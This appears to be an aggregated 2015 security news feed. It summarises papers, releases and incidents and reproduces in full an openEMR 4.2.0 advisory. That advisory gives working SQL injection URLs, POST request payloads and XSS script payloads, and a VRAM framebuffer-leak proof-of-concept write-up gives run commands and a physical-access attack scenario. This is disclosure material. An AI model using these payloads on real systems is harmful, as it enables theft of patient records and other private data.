Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

PEMU: A PIN Highly Compatible Out-of-VM Dynamic Binary Instrumentation Framework & Paper

March 22, 2015, 2:03 am
$
0
0
You can  view this new open source DBI frameworkby clicking on this  following link here.........
https://github.com/utds3lab/pemu

and read the papar with abstract provided below here......http://tinyurl.com/llbu4la

Abstract
Over the past 20 years, we have witnessed a widespread adoption
of dynamic binary instrumentation (DBI) for numerous
program analyses and security applications including program
debugging, profiling, reverse engineering, and malware
analysis. To date, there are many DBI platforms, and the most
popular one is PIN, which provides various instrumentation
APIs for process instrumentation. However, PIN does not
support the instrumentation of OS kernels. In addition, the execution
of the instrumentation and analysis routine is always
inside the virtual machine (VM). Consequently, it cannot support
any out-of-VM introspection that requires strong isolation.
Therefore, this paper presents PEMU, a new open source
DBI framework that is compatible with PIN-APIs, but supports
out-of-VM introspection for both user level processes
and OS kernels. Unlike in-VM instrumentation in which there
is no semantic gap, for out-of-VM introspection we have to
bridge the semantic gap and provide abstractions (i.e., APIs)
for programmers. One important feature of PEMU is its API
compatibility with PIN. As such, many PIN plugins are able
to execute atop PEMU without any source code modification.
We have implemented PEMU, and our experimental results
with the SPEC 2006 benchmarks show that PEMU introduces
reasonable overhead


Search

Multiple reflecting/stored XSS- and SQLi-vulnerabilities in openEMR v.4.2.0

March 22, 2015, 2:04 am
$
0
0
Advisory: Multiple reflecting/stored XSS- and SQLi-vulnerabilities in
openEMR v.4.2.0
Advisory ID: SROEADV-2015-08
Author: Steffen Rösemann
Affected Software: openEMR v.4.2.0 (Release-date: 28th Dec 2014)
Vendor URL: http://www.open-emr.org
Vendor Status: patched
CVE-ID: to be assigned after release of advisory via OSS list

==========================
Vulnerability Description:
==========================

Electronic health records and medical practice management application
OpenEMR 4.2.0 suffers from multiple SQL injection and reflecting XSS
vulnerabilities.

==================
Technical Details:
==================

All below described vulnerabilities can only be exploited by an already
authenticated user.

=====================
SQL injection vulnerabilities
=====================

An SQL injection vulnerability can be found in the facility_admin.php file
and can be abused by an attacker via the fid-parameter.

Exploit-Example:

http://
{TARGET}/interface/usergroup/facility_admin.php?fid=3%27+and+1=2+union+select+1,user%28%29,3,4,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+



Another (blind) SQL injection vulnerability resides in the
appt_encounter_report.php an can be abused by an attacker by modifying a
the form_facility-parameter in a POST-request.

Exploit-Example:

POST /openemr-4.2.0/interface/reports/appt_encounter_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/openemr-4.2.0/interface/reports/appt_encounter_report.php
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

form_facility=3%27+AND+substring(version(),1,1)=%275&form_from_date=2015-01-13&form_to_date=2015-01-13&form_refresh=true


The last (blind) SQL injection vulnerability resides in the
appointments_report.php-file and can be as well abused by an attacker via
crafting own SQL statements in the form_facility-parameter in a POST
request.


Exploit-Example:

POST /openemr-4.2.0/interface/reports/appointments_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/openemr-4.2.0/interface/reports/appointments_report.php
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

form_facility=3%27+and+substring(version(),1,1)=%274&form_provider=&form_from_date=2015-01-13&form_to_date=2015-01-13&form_apptstatus=&form_apptcat=ALL&form_orderby=comment&patient=&form_refresh=true


==============
XSS vulnerabilities
==============

A reflecting XSS-vulnerability can be found in user_admin.php via the
id-parameter.

Exploit-Example:

http://
{TARGET}interface/usergroup/user_admin.php?id=4%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E



A stored XSS vulnerability resides in add_edit_event.php via the
input-field "form_comments" and is executed in appointments_report.php.


Exploit-Example:

<script>alert(document.cookie)</script>




=========
Solution:
=========

Install the latest patch (released 21st March 2015, see [3]).


====================
Disclosure Timeline:
====================

12/13-Jan-2015 – found the vulnerability
13-Jan-2015 - informed the developers
13-Jan-2015 – release date of this security advisory [without technical
details]
13-Jan-2015 - vendor responded and announced a patch
20-Jan-2015 - vendor provides fix for testing purposes
20-Jan-2015 - agreement to release technical details when patch has been
released
21-Mar-2015 – release date of the patch
22-Mar-2015 – release date of this security advisory
22-Mar-2015 – send to FullDisclosure



========
Credits:
========

Vulnerabilities found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://www.open-emr.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-08.html
[3] http://www.open-emr.org/wiki/index.php/OpenEMR_Patches

Reverse Engineering Android Part 1(Smali Intro)

March 22, 2015, 2:07 am
$
0
0
In my recent studies in reverse engineering android apps I have taken to learning the smali assembler/disassembler.  It is my opinion that smali is a powerful tool and learning its syntax and usage will open many doors for you in the world of reverse engineering Android applications.  Through scraping the internet I found it very difficult to find an article covering the process of disassembling, modify, rebuilding and signing apks.  In this post I hope to cover the basics and give anyone who is interested the knowledge needed to start tinkering with android apps.

more here.........http://ttcubicle.blogspot.com/2015/03/re-engineering-android-part-1smali-intro.html

Is your VirtualBox reading your E-Mail? The Palinopsia Bug: Recovering framebuffers from VRAM & PoC

March 22, 2015, 2:17 am
$
0
0
html version with images available here: https://hsmr.cc/palinopsia

# The Palinopsia Bug
## Is your VirtualBox reading your E-Mail? Reconstruction of
FrameBuffers from VRAM

This document describes a method of reading and displaying previously
used framebuffers from a variety of popular graphics cards. In all 4
tested laptops the content of the VRAM was not erased upon reboot.
It is also possible to show that the content of the host VRAM can be
accessed from a VirtualBox guest, thereby leaking possibly confidential
information from a trusted host into an untrusted guest machine.

## Affected drivers and operating systems

The following combinations of operating systems and drivers were tested
and shown to be susceptible to leaking previous frame buffers into
VRAM:

1. Linux using the open source radeon driver for AMD/ATI cards
2. Linux usig the open source nouveau-driver for nVidia-cards
3. Linux using the closed source nVidia-driver
4. Windows using the closed source AMD/ATI catalyst driver

We did not test any other systems or drivers.

## Cards affected

During testing, the following 4 cards proved to be susceptible to this
method:

1. ATI Radeon HD3750
2. ATI Radeon HD4350/4550
3. nVidia NVS 5400M
4. nVidia GeForce GT650M

Note: The cards above are all the AMD and nVidia cards available at the
time of testing. It is therefore highly likely that a lot more cards
exhibit this behaviour.

On a laptop with an Intel HD4000 and a dedicated nVidia card where the
OS can switch between cards, one has to force the usage of the
dedicated card to read from VRAM. The internal graphics card seems to
be unaffected at the moment. Tests showed that in this setup only
programs forced to run on the dedicated card will leak data to VRAM.


## Proof of Concept

The basic idea of the proof-of-concept code is remarkably simple: It
allocates a number of texture buffers in VRAM without initializing
them, then directly renders them onto the screen, thereby accessing
previously used buffers.

The Code available here:
    https://hsmr.cc/palinopsia/main.cpp
uses the SDL2 library.

In most Linux distributions it can be compiled using the following
command:
``g++ main.cpp -std=c++11 `pkg-config --libs --cflags sdl2` -o poc``

The proof of concept executable excepts 3 arguments:
`./poc <width> <height> <vram in megabytes>`

The first two arguments represent the width and height of buffers that
should be allocated. The last argument represents the amount of VRAM to
be allocated. To avoid crashes, this should be slightly lower than the
actually available VRAM.

## What can be reconstructed?

The quality of the result seems to be dependent on the combination of
the graphics hardware and the driver. Some combinations produce
allmost perfect screenshots documenting user behaviour, while others
produce fragmented frames with what seems to be interlacing. The
example frames below demonstrate this effect. We are sure, that some
math magic could help here.

## Reboot

3 out of 4 tested laptops did not erase or overwrite their VRAM upon
reboot! This offers a potential attack surface for an attacker trying
to read confidential information from a locked computer he has physical
access to. A possible attack on a Windows-machine might look like this:

1. The user works on a confidential document and locks their screen
2. The attacker gains physical access and reboots the system (from the
    lockscreen) into a live system of their choice
3. The attacker reads out the VRAM and recovers screenshots of the document


This scenario was tested on a Lenovo Thinkpad W500 with a ATI Radeon
HD3750 graphics card. Below is a screenshot from within the Windows
system, with a mock-up confidential document:

https://hsmr.cc/palinopsia/before/Capture.PNG

"screenshot" of the same document after rebooting into a Xubuntu live
system and running the proof of concept code:
https://hsmr.cc/palinopsia/after/screenshot1.png

While the document is not entirely readable due to fragmentation and
interlacing, the color coding shows us that the entirety of the screen
might still be recoverable from VRAM. There are also clearly readable
fragments.

## Tails

Even 'the amnesiac icongnito live system' (tails) seems to be
susceptible to this attack. Fragmented screens of a terminated tails
session were recoverable after rebooting into a different operating
system. This partially defeats the 'amnesiac' property of the system.

The following two screenshots document this experiment:

1. booting into tails
2. generating an RSA private key and opening it in gedit
3. viewing parts of the private key in xubuntu after reboot
https://hsmr.cc/palinopsia/tails/before.png
https://hsmr.cc/palinopsia/tails/after.png

## Accessing host VRAM from inside a VirtualBox VM

If the "3D-Acceleration" feature of VirtualBox is activated, running
the proof-of-concept code from inside the VM provides the ability to
read framebuffers from the host system.

The following experiment was conducted to demonstrate this behaviour:

1. The host system (arch linux on a laptop running a ATI HD4350/4550
    card) is booted
2. Wikipedia and Youtube are opened in Chromium
3. A VirtualBox VM running Ubuntu 14.04 is booted
4. The proof of concept code is executed. The recovered frames belong to
the
    host system and clearly show the visited websites

https://hsmr.cc/palinopsia/vm1.png
https://hsmr.cc/palinopsia/vm2.png

## Gallery

The following are interesting screens that where recovered using the
proof of concept code:

The i3lock screen during password entry, containing some interesting
artifacts:
https://hsmr.cc/palinopsia/gallery/i3lock.png

Some textures recovered after a few rounds of counterstrike:source:
https://hsmr.cc/palinopsia/gallery/cs.png

## What we didn't test

It might be possible to leak the content of the VRAM of
hardware-accelerated server systems that run thin client
infrastructures. In the scariest possible way this means that an
attacker could read the memory of any machine running in a company.
This could also affect big players providing virtual desktops in the
cloud.

### Disclaimer:

As time and money are things we don't have in huge amounts, we were
limited in our testing. Everything was done on a student budget in our
free time.

## Why full disclosure?

The methods described in this document is not limited to a single
vendor or operating system, and has the potential to endanger private
data. Furthermore, the basic concept is so remarkably simple that it
seems unlikely that this is the first discovery of this behaviour.
Therefore, full disclore seems to be the ethical choice.

## Mitigation

If you use you computer to access sensitive data, TURN IT OFF after
usage, so VRAM is disconnected from power. Be wary of virtual machines
with access to hardware accelerated graphics.

Authored by Bastian 
Reitemei@students.uni-marburg.de

OpenSSL DoS tester now available (CVE-2015-0291)

March 22, 2015, 2:02 pm

Paper: A look at the PGP ecosystem through the key server data

March 22, 2015, 3:15 pm
$
0
0
Abstract: PGP-based encryption systems use a network of key servers to share public keys. These key server operate on an add only basis, thus the data gives us access to PGP public keys from over 20 years of PGP usage. Analyzing this data allows searching for cryptographic weaknesses in large scale.

I created a parser script that puts the raw cryptographic data of the PGP keys into a database. Doing this allows large scale searches for well-known vulnerabilities. DSA signatures with a duplicate $k$ value due to bad random numbers allow the calculation of the private key. Similarly analyzing RSA keys for shared prime factors allows factoring the modulus and thus also regenerating the private key.

A small number of breakable keys due to these weaknesses were found.

more here.........http://eprint.iacr.org/2015/262.pdf

rdtsc x86 instruction to detect virtual machines

March 23, 2015, 1:16 am
$
0
0
We are going to look at rdtsc instruction technique, and how it is used to detect VMs here.....http://blog.badtrace.com/post/rdtsc-x86-instruction-to-detect-vms/

Phishing and the .gov TLD

March 23, 2015, 1:25 am
$
0
0
Brand owners frequently use SPF and DKIM to protect their brands from email forgery. For example, a brand owner could register the same domain name under multiple top-level domains (TLDs) (such as .com, .net, .org, etcetera) and announce SPF/DKIM records for all of these domains (even if they were not actively being used). While generally effective, there is one loophole: what about the .gov TLD?

This loophole was recently exploited in a massive phishing attack against American Express, which started on March 4.

more here.............................http://blog.trendmicro.com/trendlabs-security-intelligence/phishing-and-the-gov-tld/
Search

Automating WPA/WPA2 cracking with Raspberry Pi

March 23, 2015, 1:31 am
$
0
0
The idea was to automate both WPA / WPA2 handshake capture and preshared key cracking (ideally on a high-end GPU or even multiple GPUs). There were a few restrictions: (1) the device should be portable (e.g., for wardriving), (2) should be able to run 24/7 without taking a loan to pay for my electricity bills, and (3) the price should be considerably low (in case the device gets lost or stolen).

Raspberry Pi was a perfect candidate.

more here.......http://whabbit.blogspot.com.au/2015/03/automating-wpawpa2-cracking-with.html

Paper: On the Effectiveness of Full-ASLR on 64-bit Linux

March 23, 2015, 1:53 am
$
0
0
ABSTRACT
Address-Space Layout Randomization (ASLR) is a technique
used to thwart attacks which relies on knowing the
location of the target code or data. The effectiveness of
ASLR hinges on the entirety of the address space layout
remaining unknown to the attacker. Only executables compiled
as Position Independent Executable (PIE) can obtain
the maximum protection from the ASLR technique since all
the sections are loaded at random locations.
We have identified a security weakness on the implementation
of the ASLR in Linux when the executable is PIE
compiled, named offset2lib. A PoC attack is described to
illustrate how the offset2lib can be exploited. Our attack
bypasses the three most widely adopted and effective protection
techniques: No-eXecutable bit (NX), address space
layout randomization (ASLR) and stack smashing protector
(SSP). A remote shell is got in less than one second.
Finally, how the RenewSSP technique can be used as a
workaround is discussed and how to remove the offset2lib
weakness from the current ASLR implementation is also presented.


more here........http://cybersecurity.upv.es/attacks/offset2lib/offset2lib-paper.pdf

Tails 1.3.1 Released

March 23, 2015, 2:50 am
$
0
0
Tails security/privacy/anonymity focused Debian-based Linux distribution has just released version 1.3.1 here......https://tails.boum.org/download/index.en.html

Dell System Detect RCE vulnerability

March 23, 2015, 6:18 am
$
0
0
I recently discovered a serious flaw with Dell System Detect that allowed an attacker to trigger the program to download and execute an arbitrary file without any user interaction. Below is a summary of the issue and the steps taken to bypass the protections Dell put in place.

more here..........http://tomforb.es/dell-system-detect-rce-vulnerability

Data Obfuscation: Now you see me... Now you don't...

March 23, 2015, 6:21 am
$
0
0
This blog post shows how malware authors use Adobe Flash files to hide their creations' 'sensitive' data. I'll be using 2 recent Neutrino EK and 1 FlashPack malvertising samples to demonstrate it. In the case of Neutrino EK our goal will be extraction and decryption of its configuration file and in the malvertising case we'll be after the initial payload URL + exploit shellcode.

more here......http://malwageddon.blogspot.in/2015/03/data-obfuscation-now-you-see-me-now-you.html

BitWhisper: The Heat is on the Air-Gap

March 23, 2015, 7:56 am
$
0
0
Researcher Mordechai Guri, guided by Prof. Yuval Elovici, has uncovered a new method to breach air-gapped systems. Our last finding on air-gap security was published in August of 2014, using a method called Air-Hopper which utilizes FM waves for data exfiltration. The new research initiative, termed BitWhisper, is part of the ongoing research on the topic of air-gap security at the Cyber Security Research Center at Ben-Gurion University. - See more at: http://cyber.bgu.ac.il/blog/bitwhisper-heat-air-gap#sthash.mIuxRUN9.dpuf

Johnson Controls Metasys Vulnerabilities – Part I

March 23, 2015, 11:27 am
$
0
0
Last week, ICS-CERT released an advisory on a set of Johnson Control MetaSys vulnerabilities I reported. You can find the advisory here: https://ics-cert.us-cert.gov/advisories/ICSA-14-350-02

It’s interesting to note that my initial email describing the vulnerabilities was sent on November 22nd, 2013. So, 1 year, 3 months, and 23 days later… we finally get a public advisory.

more here......http://xs-sniper.com/blog/2015/03/23/johnson-controls-metasys-vulnerabilities-part-i/
Search

How I hacked India’s biggest startup

March 23, 2015, 1:32 pm
$
0
0
A few weeks ago I was monitoring my phone traffic from a proxy server. While doing that I saw Ola API calls going from my phone (since I was booking a cab).

For those who don’t know about Ola, Ola Cabs is the biggest cab provider in India and also biggest competitor of Uber (again in India). It has raised $500 million in funding, and processes 150,000 bookings a day.

After seeing those flashing binary data going from my system I forgot my weekend project and started tweaking and reverse engineering Ola’s APIs which eventually resulted in breaking their money transaction system. As a result I was able to recharge my Ola wallet with any amount.

more here.........http://thenextweb.com/insider/2015/03/23/how-i-hacked-indias-biggest-startup/

"A CONFEDERACY OF 'PRIVACY' DUNCES": WHAT WE FOUND UNDER THE HOOD OF 'ANONYMOUS' CHAT APP WHISPER.SH USED BY MILLIONS

March 23, 2015, 1:41 pm
$
0
0
Everyday we hear about a newfangled mobile app or "Internet Of Things" (IoT) device. Kickstarter and IndyGoGo are rife with IoT ridiculousness. (Crowdfunding is the new "Skymall" after all.) Mobile Apps are a new kind of celebrity. A new kind of techno-fashion. The apps you use define the cliques (demographics) you participate in. Which, in turn, defines not only who you socialize with, but how you participate in public discourse.

more here.....http://www.xipiter.com/musings/a-confederacy-of-privacy-dunces-what-we-found-under-the-hood-of-an-anonymous-chat-app-used-by-millions

Announcing the new version of SecureDrop, with the results from our third security audit

March 23, 2015, 3:51 pm
$
0
0
Today, we’re announcing the latest major release of SecureDrop, our open-source whistleblower submission system. SecureDrop 0.3 uses the same basic architecture found in 0.2, but contains numerous improvements focused on better usability for both journalists and sources, a radically simplified installation process, and an auto-updating procedure that allows us to deliver important fixes to all SecureDrop installations in a timely manner.

more here........https://freedom.press/blog/2015/03/announcing-securedrop-0.3

Important Notice About Your Twitch Account

March 23, 2015, 4:58 pm
$
0
0
There may have been unauthorized access to some Twitch user account information
mre here..........http://blog.twitch.tv/2015/03/important-notice-about-your-twitch-account/

Unauthorized digital certificates for several Google domains

March 23, 2015, 5:00 pm
$
0
0
On Friday, March 20th, we became aware of unauthorized digital certificates for several Google domains. The certificates were issued by an intermediate certificate authority apparently held by a company called MCS Holdings. This intermediate certificate was issued by CNNIC.

more here......http://googleonlinesecurity.blogspot.com/2015/03/maintaining-digital-certificate-security.html
Viewing all 8064 articles
Browse latest View live
Search